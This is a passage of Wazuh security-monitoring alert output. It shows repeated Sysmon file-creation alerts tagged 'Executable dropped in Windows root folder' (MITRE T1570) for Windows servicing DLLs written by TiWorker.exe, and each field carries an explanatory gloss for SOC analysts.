data.win.eventdata.creationUtcTime:  2025-04-20 01:55:28.219
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Executable dropped in Windows root folder

🧠 What happened? Executable dropped in Windows root folder

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:35:54.496+0000 | 🧠 MITRE: ['Lateral Movement'] – ['Lateral Tool Transfer'] [T1570]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1570

🔍 Full Alert Details
timestamp:  2025-04-24T22:35:54.496+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable dropped in Windows root folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92217
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1570']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Lateral Movement']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Lateral Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  22
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534154.685368
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:55:28.2240171Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  260607
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-20 01:55:28.222 ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00} ProcessId: 12512 Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\downlevel\api-ms-win-core-comm-l1-1-0.dll CreationUtcTime: 2025-04-20 01:55:28.222 User: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:55:28.222
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-532b-6804-6b09-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12512
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\downlevel\\api-ms-win-core-comm-l1-1-0.dll
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-20 01:55:28.222
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Executable dropped in Windows root folder

🧠 What happened? Executable dropped in Windows root folder

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:35:54.513+0000 | 🧠 MITRE: ['Lateral Movement'] – ['Lateral Tool Transfer'] [T1570]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1570

🔍 Full Alert Details
timestamp:  2025-04-24T22:35:54.513+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable dropped in Windows root folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92217
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1570']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Lateral Movement']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Lateral Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  23
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534154.688458
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:55:28.2260495Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  260608
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-20 01:55:28.224 ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00} ProcessId: 12512 Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\downlevel\api-ms-win-core-console-l1-1-0.dll CreationUtcTime: 2025-04-20 01:55:28.224 User: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:55:28.224
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-532b-6804-6b09-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12512
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\downlevel\\api-ms-win-core-console-l1-1-0.dll
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-20 01:55:28.224
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Executable dropped in Windows root folder

🧠 What happened? Executable dropped in Windows root folder

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:35:54.523+0000 | 🧠 MITRE: ['Lateral Movement'] – ['Lateral Tool Transfer'] [T1570]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1570

🔍 Full Alert Details
timestamp:  2025-04-24T22:35:54.523+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable dropped in Windows root folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92217
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1570']
List of ATT&CK IDs matched (e.g., T1059). If you see high‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Lateral Movement']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Lateral Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  24
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high‑value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534154.691560
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:55:28.2285695Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  260609
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-20 01:55:28.226 ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00} ProcessId: 12512 Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\downlevel\api-ms-win-core-datetime-l1-1-0.dll CreationUtcTime: 2025-04-20 01:55:28.226 User: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:55:28.226
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-532b-6804-6b09-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12512
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\downlevel\\api-ms-win-core-datetime-l1-1-0.dll
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-20 01:55:28.226
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Executable dropped in Windows root folder

🧠 What happened? Executable dropped in Windows root folder

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:35:54.524+0000 | 🧠 MITRE: ['Lateral Movement'] – ['Lateral Tool Transfer'] [T1570]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1570

🔍 Full Alert Details
timestamp:  2025-04-24T22:35:54.524+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable dropped in Windows root folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92217
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1570']
List of ATT&CK IDs matched (e.g., T1059). If you see high‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Lateral Movement']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Lateral Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  25
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high‑value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534154.694666
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:55:28.2312480Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  260610
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-20 01:55:28.231 ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00} ProcessId: 12512 Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\downlevel\api-ms-win-core-datetime-l1-1-1.dll CreationUtcTime: 2025-04-20 01:55:28.228 User: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:55:28.231
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-532b-6804-6b09-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12512
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\downlevel\\api-ms-win-core-datetime-l1-1-1.dll
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-20 01:55:28.228
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Executable dropped in Windows root folder

🧠 What happened? Executable dropped in Windows root folder

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:35:54.533+0000 | 🧠 MITRE: ['Lateral Movement'] – ['Lateral Tool Transfer'] [T1570]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1570

🔍 Full Alert Details
timestamp:  2025-04-24T22:35:54.533+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable dropped in Windows root folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92217
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1570']
List of ATT&CK IDs matched (e.g., T1059). If you see high‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Lateral Movement']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Lateral Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  26
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high‑value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534154.697772
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:55:28.2331969Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  260611
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-20 01:55:28.231 ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00} ProcessId: 12512 Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\downlevel\api-ms-win-core-debug-l1-1-0.dll CreationUtcTime: 2025-04-20 01:55:28.231 User: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:55:28.231
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-532b-6804-6b09-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12512
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\downlevel\\api-ms-win-core-debug-l1-1-0.dll
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-20 01:55:28.231
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Executable dropped in Windows root folder

🧠 What happened? Executable dropped in Windows root folder

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:35:54.552+0000 | 🧠 MITRE: ['Lateral Movement'] – ['Lateral Tool Transfer'] [T1570]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1570

🔍 Full Alert Details
timestamp:  2025-04-24T22:35:54.552+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable dropped in Windows root folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92217
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1570']
List of ATT&CK IDs matched (e.g., T1059). If you see high‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Lateral Movement']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Lateral Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  27
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high‑value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534154.700866
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:55:28.2352253Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

